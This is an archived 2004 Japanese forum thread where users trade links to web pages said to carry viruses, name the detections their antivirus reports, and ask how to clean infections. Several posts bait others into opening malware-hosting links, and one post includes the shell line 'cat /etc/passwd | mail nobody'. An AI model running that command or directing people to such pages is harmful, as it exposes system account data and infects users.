URLリンク(www.geocities.com)

472:名無しさん@お腹いっぱい。
04/03/23 08:41
URLリンク(www.geocities.co.jp)
URLリンク(www.geocities.co.jp)
URLリンク(www.geocities.co.jp)

473:名無しさん@お腹いっぱい。
04/03/27 01:54
ウイウスに感染したみたいです↓eが沢山…
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeええええええこんな状態なんdすが
えばせええうたええええええええええええええ
なんとかならないでしょうか?
ウイルスバスター購入しないとだめですか?


474:名無しさん@お腹いっぱい。
04/03/28 22:20
復讐とか探偵、別れさせ屋とか書いてあるblacklistっていう怪しげな
ページにぜんぜん関係ないところをみてたのにふいに踏んでしまった。
ホームの設定がblacklistに書き換えられてしまった。気持ちわるかった
設定しなおしたら直ったけど。ウイルスバスターいれたけど、効果あるんかな。
そんなページがあるなんて知らなかったよ。

475:名無しさん@お腹いっぱい。
04/03/29 06:48
URLリンク(www.xfreehosting.com)

476:名無しさん@お腹いっぱい。
04/03/31 16:49
age

477:名無しさん@お腹いっぱい。
04/04/02 23:55
>>475ってどうなるのでつか?

478:名無しさん@お腹いっぱい。
04/04/03 00:13
ある女性の顔が夢にまで出てくるようになってしまったのですが、
何らかのウィルスに感染したのでしょうか?
症状としては、胸が苦しくなり、食欲が無くなり、他の事に集中できなくなります。
夜も中々寝付けません。

人生これからという大切な時期、非情に切実な問題です。
情報お待ちしています。







追伸)その女性は醜いお婆さんです。

479:(・∀・)チンコー
04/04/03 21:06
マンコー

480:名無しさん@お腹いっぱい。
04/04/05 10:44
史上最強のウイルスサイト
URLリンク(www.keishicho.metro.tokyo.jp)

481:名無しさん@お腹いっぱい。
04/04/06 00:39
URLリンク(321.cn)

482:名無しさん@お腹いっぱい。
04/04/15 01:00
>>477
ウイルスとスパイウエアの複合感染
トロイがトロイを呼び、なかなか駆除できない。
今困ってるところ。


483:名無しさん@お腹いっぱい。
04/04/15 01:18
なぜかこの板更新するたびに
ノートン先生がラブレター注意と申されている

484:名無しさん@お腹いっぱい。
04/04/15 01:20
datファイルの誤警告だろ

485:名無しさん@お腹いっぱい。
04/06/19 17:19
トロイとスパイウエアの複合感染に困っています。
ノートンで駆除しても、ネットにつなぐとまた来ます・・・
感染すると何かを発信しまくって、
ネットが出来なくなったり、PCが不安定になったりします。
たすけて・・・

486:名無しさん@お腹いっぱい。
04/06/20 12:30
>>485
やだ

487:名無しさん@お腹いっぱい。
04/06/20 17:42
行って見たら調子が悪い。これは何ですか?

URLリンク(gb.bbs.ws)


488:名無しさん@お腹いっぱい。
04/06/20 17:43
>>487
アドレスです

489:名無しさん@お腹いっぱい。
04/06/20 18:04
>>485
怪しいサイトに行かないようにしましょう。
ブラウザはオペラなどを使いましょう。

490:名無しさん@お腹いっぱい。
04/06/20 20:07
>>487
これも踏むように!
URLリンク(anagami.hp.infoseek.co.jp)

491:sage
04/06/20 20:59
>>487

VIRUS_NAME: Exploit.HTML.Mht
VIRUS_NAME: Java/OpenConnection.F
VIRUS_NAME: Java/Needy.D
VIRUS_NAME: TrojanDropper.VBS.Zerolin
VIRUS_NAME: TrojanDownloader.JS.Small.d

これらのウイルスが漏れなく付いてきます。アクセスされる方は自己責任で…

492:名無しさん@お腹いっぱい。
04/06/20 21:05
488さん、487はただのアドレスですか?怖くて行けないのですが・・・・。

493:名無しさん@お腹いっぱい。
04/06/20 21:07
487です。491さん、ありがとう。今から駆除します。

494: 491
04/06/20 22:22
>>492

>>491 を参照するように! あくまでも自己責任で…


495:名無しさん@お腹いっぱい。
04/06/20 23:02
>>492
これも踏むように!
URLリンク(anagami.hp.infoseek.co.jp)

496:名無しさん@お腹いっぱい。
04/06/21 00:47
490=495はうざい!!

497:名無しさん@お腹いっぱい。
04/06/21 00:49
Operaでも感染するページってある?

498:名無しさん@お腹いっぱい。
04/06/21 19:24
ここウイルスいる
URLリンク(talk.to)

499:名無しさん@お腹いっぱい。
04/06/21 20:52
>>498
そのページにはウィルスはいないが、リンク先はウィルスだらけ。

500:名無しさん@お腹いっぱい。
04/06/22 15:02
500ゲット

501:名無しさん@お腹いっぱい。
04/06/30 18:14
tes

502:名無しさん@お腹いっぱい。
04/06/30 20:30
あぼーんばっかでつね
NGワードリスト貼ってくれる神キボンヌ

503:名無しさん@お腹いっぱい。
04/06/30 20:57
★注意☆ ブラクラ保管庫 ☆注意★ 
スレリンク(pcqa板)
開いただけでウイルスに感染するページ
スレリンク(sec板)
勇気が無くて見られない画像解説スレ Part577
スレリンク(entrance板)
勇気がなくて見れない画像解説オカ板26(・ε・)
スレリンク(occult板)
あんたらのブラクラウィルスリンクを貼ってみれ②
スレリンク(sec板)
おせて下ちい、VAIOのomgファイル
スレリンク(pcqa板)

504:名無しさん@お腹いっぱい。
04/07/01 00:18
>>503
自分でリスト作れってことでつね。

505:名無しさん@お腹いっぱい。
04/07/01 00:38
スレリンク(car板)l50

506:名無しさん@お腹いっぱい。
04/07/01 04:44
どうしても聞いただけでウイルスに感染するページ に見える

507:名無しさん@お腹いっぱい。
04/07/06 01:01
URLリンク(dc-ita.dyndns.tv)

508:名無しさん@お腹いっぱい。
04/07/06 23:12
URLリンク(www2.strangeworld.org)


509:あぼーん
あぼーん
あぼーん

510:名無しさん@お腹いっぱい。
04/07/07 21:36
↓ここに行ったら感染した。
URLリンク(www14.smutserver.com)
踏まないように…。

感染したの初めてだったからあわてたよ。

511:名無しさん@お腹いっぱい。
04/07/07 22:19
>>510 本当だ。トロイの木馬だね。

VIRUS_NAME: TrojanDownloader.JS.Small.d


512:名無しさん@お腹いっぱい。
04/07/07 22:34
ここは?
URLリンク(www.mb.ccnw.ne.jp)


VBS_REDLOF.Aの場合とVBS_REDLOF.A-11が引っ掛かるときがある。
その差はどうして?

513:名無しさん@お腹いっぱい。
04/07/07 22:42
>>512
うちのはVBS/Redlof.Aで反応した。


514:名無しさん@お腹いっぱい。
04/07/07 22:45
>>510
やべ。オペラで開いちゃったけど大丈夫かな?

515:名無しさん@お腹いっぱい。
04/07/07 22:49
URLリンク(www.mb.ccnw.ne.jp)
一番上のリンクから入るとVBS_REDLOF.A-11とVBS_REDLOF.A出るね。
やべっ!VBS_REDLOF.A-11が隔離出来ないと出たぞ。
当方、バスター!でもVBS_REDLOF.Aが隔離出来てるから大丈夫なのか?
感染してるのは同じファイルみたいだし。

516:名無しさん@お腹いっぱい。
04/07/07 23:01
>>514
スキャンしたら大丈夫みたい。

517:名無しさん@お腹いっぱい。
04/07/07 23:05
>>515
テンポラリの中身を消せば大丈夫だんべ

518:名無しさん@お腹いっぱい。
04/07/07 23:11
テンポラリってなんですか?

/odekake1.htmlに直リンで飛んだだけでは2つは出ないけど
/odekake.htmlからリンクしていくと2つ出るのはどうして?

519:名無しさん@お腹いっぱい。
04/07/07 23:14
>>518
一時フォルダのことでは?

520:名無しさん@お腹いっぱい。
04/07/07 23:16
>>519
おお~、ありがとです!

521:名無しさん@お腹いっぱい。
04/07/08 00:57
みんなチャレンジャーだね

522:名無しさん@お腹いっぱい。
04/07/08 20:46
>>521
せっかくアンチウイルスソフト入れてるんだから、
たまには動作チェックしないと(w

523:名無しさん@お腹いっぱい。
04/07/08 21:01
homepage3.nifty.com/tef-room/virus/securepedo-1.html

ページを開いた途端にMacAfeeが反応してトロイの木馬を検出した
よりによって「ウィルス・トロイ・スパイウェア」対策のサイトだというのに(苦笑)

単なる誤動作なら良いんだけど

524:名無しさん@お腹いっぱい。
04/07/08 21:05
試すのならEICARテストで十分かと・・・漏れは怖くて人柱なんてできねー

525:名無しさん@お腹いっぱい。
04/07/08 21:09
>>524
何、それ?

526:524
04/07/08 21:11
>>525
アンチウイルスソフトがちゃんと機能してるか試すやつね。ちなみに害は一切ないので
ご安心を・・・
URLリンク(www.trendmicro.co.jp)

527:524
04/07/08 21:14
URLリンク(www.eicar.org)

こっちのほうがいいかな下のDownload areaってとこ。

528:名無しさん@お腹いっぱい。
04/07/08 21:26
>>527
やってみたよ。
eicar.comとeicar.com.txtは反応したけど、
eicar_com.zipとeicarcom2.zipは反応しなかった。

529:名無しさん@お腹いっぱい。
04/07/08 21:34
バスターだが eicar.com.txt に無反応・・・orz

530:名無しさん@お腹いっぱい。
04/07/08 21:38
>>528
DLしたファイルをスキャンしたら反応した。
DL時には無反応だった。

531:名無しさん@お腹いっぱい。
04/07/09 08:28
今ギコナビでWindows板のupdateしたときに上げるスレ開いたら、
ラブレター入ってきた。ノートンが駆除してくれたけど。
その後他のスレ開こうとしたら、いつまで経ってもスレ取得できなくて、
一度ギコナビ終了して他のスレを何個か開いたけど異常なし。
もう一度updateスレ開いたら、やっぱりラブレターが。その後もやっぱりスレ取得できず。

IEで開いても何もなかった。なんで?

532:名無しさん@お腹いっぱい。
04/07/09 08:43
>>531
それ以前の問題としてノートン使ってるなら2ちゃんのログ除外の設定くらいしとけや。
除外の仕方くらい分かるよね?設定すれば君のような間抜けな質問はできない筈だがな。


533:名無しさん@お腹いっぱい。
04/07/09 10:45
>>531
プ

534:名無しさん@お腹いっぱい。
04/07/09 11:12
>>531
ノートンがvbsウィルスのソースに誤反応2(パソコン初心者板)
スレリンク(pcqa板)
↑そのスレもノートンの誤反応するけど、気にせず読むこと。

535:名無しさん@お腹いっぱい。
04/07/09 11:59
あ~あ、531苛めるからすねてどっかいっちゃったよ・・・

536:531
04/07/09 21:48
書き込んだ後仕事行って今帰ってきた。
何か凄い恥ずかしい事しちゃったみたい。スレ汚しスマソ。

>532、>534
こんな馬鹿に教えてくれてありがとう!
今から勉強してくるよ。

537:名無しさん@お腹いっぱい。
04/07/10 03:41
>>527
AntiVir eicar.comしか反応しなかったw

538:名無しさん@お腹いっぱい。
04/07/10 18:57
コンピューターウイルス感染対策には、
石けんと温水を用いた十分な手洗いが有効であると
CDC(アメリカ疾病対策センター)が勧告しました。

URLリンク(www.geocities.jp)

539:名無しさん@そうだ選挙に行こう
04/07/11 18:51
どなたか教えて下さい。
>>498のサイト、某板に貼られていたのを踏んでしまったんですが、
ActiveXコントロールのインストールダイアログで「いいえ」を選択し、
バスター2004が隔離したファイルを削除しただけでは、
まだ何かに感染していることがあるのでしょうか?
ブラウザはIE、OSはXPproバスターのウイルスパターンは本日の最新版ですた。
踏んだのも今日です


540:名無しさん@そうだ選挙に行こう
04/07/11 19:50
>>539
それで解決。問題なし。不安ならスキャンするべし。

541:539
04/07/11 21:55
>>540
ありがとうございます
不安どした

542:名無しさん@お腹いっぱい。
04/07/14 18:07
ニュー速VIP板のこのスレを見るだけでノートンの警告が出るんですけど
何で?
スレリンク(news4vip板)l50
あとこの板にもスレを見るだけで、ノートンの警告が出るスレが
あるんですけど、いったいどうなってるんですかね?


543:名無しさん@お腹いっぱい。
04/07/14 20:15
6 名前:名無しさん@お腹いっぱい。[sage] 投稿日:04/07/02(金) 07:39
■2ch見ていたらvbsウィルスが検出された!
 
VBSウィルスなどのソースコードが投書の中に含まれていると、
2chの掲示板とノートンのスキャンエンジン、双方の仕様の衝突により
ノートンが反応することがあります。 この「からくり」の説明
スレリンク(sec板:11番)

一般論として「htm」「html」拡張子などを安易に検索対象から外すことは、
奨励されません。これを感染ターゲットにするウィルスが数種確認されています。
URLリンク(www.symantec.com)

このため一部のブラウザでは2chが正常に読めない場合があります。
これについてのトークは専用スレが設けられているので、↓へどうぞ。
(このスレは、イタズラ投稿が原因でノートンが反応する場合もあります)
ノートンがvbsウィルスのソースに誤反応2
スレリンク(pcqa板)

544:名無しさん@お腹いっぱい。
04/07/14 22:14
URLリンク(mattarisiya.hp.infoseek.co.jp)

どう?

545:名無しさん@お腹いっぱい。
04/07/14 22:29
>>544
VBS/Redlof.Aが検知。危険。

546:名無しさん@お腹いっぱい。
04/07/15 03:33
ここはウィルスの交換所でつか?
直リンばかりで、恥ずかしくないの?

547:名無しさん@お腹いっぱい。
04/07/15 09:15
AVソフト入れてないんだけどactiveXを手動でインストールにしていいえ選択しておけば
やばいページ開いても感染しない?

548:名無しさん@お腹いっぱい。
04/07/15 09:54
>547
んなこたぁない

549:名無しさん@お腹いっぱい。
04/07/15 11:00
Windowsアップデートをしておけば、あとは質問にいいえで大丈夫だろ。
入ってきようがないではないか。

550:名無しさん@お腹いっぱい。
04/07/15 11:01
java有効にしていると即感染するページってのはあるんですか?

551:名無しさん
04/07/15 11:20
》550
あるよ。
特に金髪美女のヌードが載っているのは、典型的な例。

552:ビーフン
04/07/15 17:33
書き込みOK!
URLリンク(space-9.maxs.jp)
書きと消しの勝負が毎日

553:名無しさん@お腹いっぱい。
04/07/15 23:05
URLリンク(haiiro.info)

情報頼む

554:名無しさん@お腹いっぱい。
04/07/15 23:53
>>553
警告!セキュリティクラッシュgif


555:名無しさん@お腹いっぱい。
04/07/15 23:55
そのファイル、削除されてない?

556:名無しさん@お腹いっぱい。
04/07/16 00:06
>>553
ふんでみりゃわかる

557:名無しさん@お腹いっぱい。
04/07/16 00:08
302 FOUNDと出てくるみたいだが?

558:名無しさん@お腹いっぱい。
04/07/16 00:09
あ、違う。The document has moved Here.だ。

559:名無しさん@お腹いっぱい。
04/07/16 07:53
>552
むかつき板。埋めたが削除

560:λ.....&rlo;形人毒&rle; ◆diePoisons
04/07/16 08:25


   ヽ( 'A`)ノ 
      \ \
       ○○

毒人形さんがなんとなく現れた

561:名無しさん@お腹いっぱい。
04/07/17 12:13
いまこのスレ開いた瞬間にウイルス警告来て焦った。
Js.Trojan.WindowBomb
_| ̄|○  鬱だ折ろう...

562:名無しさん@お腹いっぱい。
04/07/18 10:43
HDDを消去するウィルスサイトはどこですか?(生きているやつ)

563:あぼーん
あぼーん
あぼーん

564:名無しさん@お腹いっぱい。
04/07/18 19:40
>>563
誰も送らねーよ

565:あぼーん
あぼーん
あぼーん

566:あぼーん
あぼーん
あぼーん

567:名無しさん@お腹いっぱい。
04/07/20 20:41
URLリンク(masaakitoy.hp.infoseek.co.jp)
view-source:URLリンク(masaakitoy.hp.infoseek.co.jp)
明らかにREDLOFに感染してるんだが(VB2004で警告出た)ゴルァメール送ってみたら
割り当て容量使い果たしていて強制送還喰らったんで掲示板にも書き込んでみたが、
他にも感染報告あるのに感染してないと抜かしてる管理人はDQN

568:名無しさん@お腹いっぱい。
04/07/21 18:00
>>586
本当だわ!
ブラクラやばいチェックでAVGが反応・・・・

569:名無しさん@お腹いっぱい。
04/07/21 20:54
>>568
未来にレスですかぁ?

570:名無しさん@お腹いっぱい。
04/07/21 20:56
そのレスの所で自作自演するつもりなのだろうw

571:名無しさん@お腹いっぱい。
04/07/22 23:21
インターネットオプションでセキュリティを「強」に

572:名無しさん@お腹いっぱい。
04/07/23 17:31
URLリンク(sasurai.gaiax.com)

573:名無しさん@お腹いっぱい。
04/07/23 19:16
nyで落とした音楽ZIPにはいっていた
EXEファイル、フォルダー型のアイコンにだまされて
ダブルクリックしてしまいました

CPU50%以上食ってなかなか立ち上がりません
タスクマネージャでみるとEXP.EXEで食ってます

なんとか対処法をおしえてください!!

OSはXPのPROですよろしくおねがいします

574:568
04/07/23 19:33
>>570
すまん!おかすぃな?ここへレスでやったのに?
>>567へのレスね・・・


575:名無しさん@お腹いっぱい。
04/07/24 01:52
>>573
放置されてるっぽいから答えてやろう。
ハードディスクをフォーマットしてOSを再インストールしなさい。
どこに潜んでるかわからないから、つないでいるドライブ全部フォーマットするんだよ。

576:名無しさん@お腹いっぱい。
04/07/24 15:16
>573
つーか早くフォーマットしないとカウントダウン始まるよ

577:あぼーん
あぼーん
あぼーん

578:名無しさん@お腹いっぱい。
04/07/25 00:54
>>577
私怨厨房に教えてあげよう。


hotmailって受信時に自動でウイルスチェック入るよ。

579:名無しさん@お腹いっぱい。
04/07/25 11:30
漏れはJ混むなのだが、

J-COM Netより新サービスのご案内
『ホームページウイルススキャンサービス』
トライアルを7月6日よりスタート    ・・・ってのが着てますた。

この種のブラクラページとかウィルスページに効くのかな?
多分、串みたいなのを通すので遅くなるだろうが・・・

良く踏むんだよ・・・_| ̄|○


580:名無しさん@お腹いっぱい。
04/07/25 17:12
暇なんで、メールください。
ちなみに18歳の女子高生です。
彼氏没収中。タハ間違えたー★
募集でーす。(≧▼≦;)アチャ
メールまってマース★
ウイルスは勘弁(*゚ー^)/

581:名無しさん@お腹いっぱい。
04/07/25 18:14
>>572
勘弁してくれ・・・
ネットスケープでもOUT!

582:名無しさん@お腹いっぱい。
04/07/25 18:30
>>581
何に感染するの?
うちでは無反応なんだけど。

583:名無しさん@お腹いっぱい。
04/07/25 18:51
>>572
何だ、ただのブラクラか
IEの強制終了が出来ない環境は、ちょっと辛いかもな。

584:名無しさん@お腹いっぱい。
04/07/25 22:34
URLリンク(stream.tanteifile.com)
お願いします。

585:名無しさん@お腹いっぱい。
04/07/25 22:51
>>584
落ちてくるファイルはの拡張子はmp2
ウィルスコード無しとの判定だが責任は持てん。

586:584
04/07/25 23:00
>>585
そうでしたか、ありがとうございます。

587:名無しさん@お腹いっぱい。
04/07/25 23:03
>>586
ただのネタ動画。ウイルスじゃない。

588:名無しさん@お腹いっぱい。
04/07/28 10:29
[二次元萌えらぼ]、ウイルス反応が出まくってひどいんだけど。
いったい何なの?


589:あぼーん
あぼーん
あぼーん

590:名無しさん@お腹いっぱい。
04/07/28 14:04
最近、良く見かけるんですけど、
URLリンク(jbbs.livedoor.com)
これってウィルスとか、セキュリティホールの悪用とかなんですか?

591:名無しさん@お腹いっぱい。
04/07/28 15:43
何か変な現象でも起きる?うちは平気なんだけど。

592:名無しさん@お腹いっぱい。
04/07/28 16:29
>>590
うちは Not Foundだね。

593:590
04/07/28 17:23
>>591
いや、最近2ちゃんの色んな板で、
>60 名前:目のつけ所が名無しさん :04/07/26 13:55
>ここはどうかな
URLリンク(jbbs.livedoor.com)
こんな書き込みを見かけるんで、ちょっと気になったんですけど・・・
何なんでしょう、これ?

594:あぼーん
あぼーん
あぼーん

595:あぼーん
あぼーん
あぼーん

596:あぼーん
あぼーん
あぼーん

597:名無しさん@お腹いっぱい。
04/07/30 15:19
【ノートン】ウイルスコピペ報告スレ【誤検出】
スレリンク(sec2chd板:826番)

cat /etc/passwd | mail nobody

598:名無しさん@お腹いっぱい。
04/07/30 17:49
>>595
なんのソースだっけ?

599:名無しさん@お腹いっぱい。
04/07/31 17:49
URLリンク(www.kyoei-sys.co.jp)
↑普通の会社のページで、ウイルスじゃないんでしょうけど、
このページの「メール」をクリックするとウィンドウが沢山開いてしまうんですけど、自分だけ?

600:名無しさん@お腹いっぱい。
04/07/31 18:27
>>599
うん、あなただけ

601:名無しさん@お腹いっぱい。
04/07/31 21:15
ウイルスのソース、具体的な作り方を
乗っけてるページありませんか?
防御手段の一つとして参考にしてみたいのですが

結構探してますがみつから無いっス('ω')

602:名無しさん@お腹いっぱい。
04/07/31 21:21
>>601
あたりめえだ バカ

603:名無しさん@お腹いっぱい。
04/08/01 10:42
>>599
ほれ、やるよ
URLリンク(www.geocities.co.jp)

604:ねらいうちっていうファイル?
04/08/05 20:06
起動するとなんかメッセージが出るプログラムっぽいです。
うざいので、知ってる方いたら対処法教えてください。

605:名無しさん@お腹いっぱい。
04/08/17 13:34
URLリンク(219.117.21.115:37562)

606:名無しさん@お腹いっぱい。
04/08/17 15:01
>605
芸のないブラクラ貼るなヴォケ!!
ウイルスなんかいねぇじゃねーか

607:名無しさん@お腹いっぱい。
04/08/24 11:19
あげ

608:名無しさん@お腹いっぱい。
04/08/24 11:38
ウイルス>グロ画像>ブラクラ

609:名無しさん@お腹いっぱい。
04/08/24 20:39
URLリンク(kantweb.s7.x-beat.com)

610:あぼーん
あぼーん
あぼーん

611:あぼーん
あぼーん
あぼーん

612:名無しさん@お腹いっぱい。
04/08/25 00:38
hotmailには受信時ウイルス駆除機能が付いています。
私怨厨氏ね

613:名無しさん@お腹いっぱい。
04/08/25 00:52
荒らし依頼スレに書かれたのを見て来た
記念真紀子

614:名無しさん@お腹いっぱい。
04/08/25 01:19
>>613
荒らし依頼削除スレだろ?

615:名無しさん@お腹いっぱい。
04/08/25 13:43
URLリンク(www2.strangeworld.org)
お願いします



616:名無しさん@お腹いっぱい。
04/08/25 14:16
>615
何をどうお願いしてるのかさっぱりわからんが…
ここはただのブラクラ貼るスレじゃねーんだって

617:名無しさん@お腹いっぱい。
04/08/25 20:52
独り言だが、
>>615は「Js.Trojan.WindowBomb」か、、、


618:名無しさん@お腹いっぱい。
04/08/25 21:32
>617
Norton先生はそうおっしゃったのか…
オミトロン越しにソース見ただけだからMcAfeeは反応しなかったよ

619:名無しさん@お腹いっぱい。
04/08/26 00:16
>>617-618
どうもありがとうございます(>_<)


620:名無しさん@お腹いっぱい。
04/08/27 00:49
URLリンク(asongfor.s13.xrea.com)

これはウイルスですか?開いてしまった後にウイルスだと言われてパニックになりました!
教えてください。どうしたらいいのでしょう?御願いします!


次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch